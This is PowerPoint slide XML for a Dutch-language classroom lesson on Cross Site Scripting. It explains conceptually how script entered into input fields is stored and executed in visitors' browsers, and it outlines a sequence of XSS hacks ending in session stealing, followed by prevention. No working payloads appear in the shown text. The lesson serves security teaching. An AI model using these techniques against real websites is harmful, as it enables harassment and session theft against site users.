        <p:spPr>
          <a:xfrm>
            <a:off x="11708793" y="0"/>
            <a:ext cx="483207" cy="288874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Afbeelding 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324551" y="4694255"/>
            <a:ext cx="2047791" cy="1224224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2447330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5526183" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>Het algemene plaatje </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0353" y="3208344"/>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web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9366" y="2703163"/>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8"/>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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6826462" y="3701417"/>
            <a:ext cx="13852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chte verbindingslijn met pijl 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6826462"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39" name="Tekstvak 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6914293"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40" name="Tekstvak 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6914293"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604139" y="3678572"/>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412240" y="5133773"/>
            <a:ext cx="2357120" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Wat zou hier nu fout kunnen gaan?</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3324485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"Cross Site Scripting (XSS)" attack</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Introductie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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Afbeeldingsresultaat voor web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730" y="3237845"/>
            <a:ext cx="1003390" cy="12022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clou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66" y="2703163"/>
            <a:ext cx="3177096" cy="22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9170" y="5159985"/>
            <a:ext cx="858918" cy="858918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Afbeelding 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9579332" y="5058173"/>
            <a:ext cx="938820" cy="1062541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Rechte verbindingslijn met pijl 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2264098" y="3701417"/>
            <a:ext cx="1385268" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="soli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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2264098"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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6826462" y="3701417"/>
            <a:ext cx="1385268"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chte verbindingslijn met pijl 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6826462" y="4046857"/>
            <a:ext cx="1385268"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stCxn id="1030" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8478629" y="4469611"/>
            <a:ext cx="0" cy="690374"/>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Rechte verbindingslijn met pijl 34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8892957" y="4469611"/>
            <a:ext cx="789523" cy="58856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kstvak 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2509864"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38" name="Tekstvak 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2509864"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39" name="Tekstvak 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6914293" y="3326692"/>
            <a:ext cx="1107440" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Tekstvak 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6914293" y="4073568"/>
            <a:ext cx="1107440" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Tekstvak 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694317" y="4519209"/>
            <a:ext cx="962003" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>verkeer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Tekstvak 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9287718" y="4258234"/>
            <a:ext cx="1113095" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pagina's</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Tekstvak 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8049170" y="2817607"/>
            <a:ext cx="1287870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Tekstvak 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="890513" y="2818654"/>
            <a:ext cx="1429354" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Tekstvak 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7834694" y="6073435"/>
            <a:ext cx="1287870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Tekstvak 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9519920" y="6073435"/>
            <a:ext cx="1287870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>file system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Tekstvak 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593979" y="3174489"/>
            <a:ext cx="1287870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Tekstvak 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="112281" y="5049838"/>
            <a:ext cx="6539728" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>De hacker maakt gebruikt van configuratie-fouten in de webpagina en het gedrag van browsers om vooral te klieren. Advanced hackers kunnen echter ook sessies overnemen. De kern is het plaatsen van "slimme" content  in input velden. (of GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>out of scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>De impact kan domweg vervelend zijn. Het is echter mogelijk om echt schade te berokkenen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="Afbeeldingsresultaat voor hack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420" y="3359155"/>
            <a:ext cx="909429" cy="909429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Tekstvak 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9682480" y="1817993"/>
            <a:ext cx="2312105" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Benadeelden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alle gebruikers van de website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>het bedrijf achter de website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imagoschade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1541665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400" dirty="0" smtClean="0"/>
              <a:t>Introductie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS principe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>testopstelling maken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>1.Onschuldige "spielerei"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>2.Klieren</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>3.Klieren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>enhanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>4.Misleiding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>5.Sessie Stelen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>XSS voorkomen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Opdracht</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1573516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937" y="1096894"/>
            <a:ext cx="7776232" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>XSS principe</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>XSS: principe</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38" name="Tekstvak 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2509864" y="3444869"/>
            <a:ext cx="1107440" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>invoer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Tekstvak 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="112281" y="5049838"/>
            <a:ext cx="4501822" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>Ipv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> gewone tekst, kan natuurlijk ook HTML code en/of Javascript ingevoerd worden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Dit wordt dan in de database opgeslagen en weer op de pagina geplaatst.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Echter zal de browser de code interpreteren en javascript uitvoeren.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="Afbeeldingsresultaat voor hack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420" y="3359155"/>
            <a:ext cx="909429" cy="909429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Afbeelding 28"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4614103" y="2428099"/>
            <a:ext cx="6680852" cy="3290938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
